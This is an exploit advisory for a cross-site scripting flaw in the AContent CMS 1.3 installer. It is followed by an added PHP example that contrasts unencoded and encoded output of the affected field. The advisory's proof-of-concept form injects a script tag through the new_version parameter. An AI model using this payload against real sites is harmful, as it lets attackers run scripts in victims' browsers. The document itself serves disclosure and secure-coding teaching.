AContent CMS version 1.3 suffers from a cross site scripting vulnerability.
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: Cross Site Scripting in AContent Content Management System
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download
|[+]
|[+] Version : 1.3
|[+]
|[+] Vendor : http://www.atutor.ca/acontent/
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12/29/2016
|=============================================================|
|[+] Vuln Path : http://www.site.go.th/AContent/install/install.php
|[+] Method : POST
|=============================================================|
|[+] Exploit Code:
<form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form">
    <input type="hidden" name="action" value="process" />
    <input type="hidden" name="step" value="1" />
    <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" />

    <input type="submit" name="submit" class="button" value="I Agree" />
        <input type="submit" name="submit" class="button" value="I Disagree" /><br />

</form>
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
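
Added example (not part of the original advisory and not AContent's own code): the advisory gives no root cause, so this assumes install.php writes the POSTed new_version back into a hidden field's value attribute, which the quote-breaking value in the form above suggests. It contrasts that unencoded output with an encoded and validated one; all function names are hypothetical.

```php
<?php
// Added example: hypothetical installer step, not AContent's actual source.
// Assumption: the installer echoes the POSTed new_version into a hidden field.

// Vulnerable pattern: raw request data written into an attribute value.
function render_hidden_unsafe(string $name, string $value): string
{
    return '<input type="hidden" name="' . $name . '" value="' . $value . '" />';
}

// Hardened pattern: encode for the HTML attribute context, both quote styles.
function render_hidden_safe(string $name, string $value): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="' . $enc($name) . '" value="' . $enc($value) . '" />';
}

// Second layer: a version string consists of digits and dots only.
function valid_version(string $v): bool
{
    return preg_match('/\A\d+(\.\d+){0,3}\z/', $v) === 1;
}

// Constructed sample inputs: a normal value and the value from the advisory's form.
$samples = ['1.3', '1.3\'"/><ScRiPt >alert(123)</ScRiPt>'];

foreach ($samples as $v) {
    echo "input:  ", $v, PHP_EOL;
    echo "valid:  ", valid_version($v) ? 'yes' : 'no (reject the request)', PHP_EOL;
    echo "unsafe: ", render_hidden_unsafe('new_version', $v), PHP_EOL;
    echo "safe:   ", render_hidden_safe('new_version', $v), PHP_EOL, PHP_EOL;
}
```

Run with the PHP CLI (7.4 or later) to compare the two renderings: in the encoded output the quotes and angle brackets appear as entities, so the value stays inside the attribute.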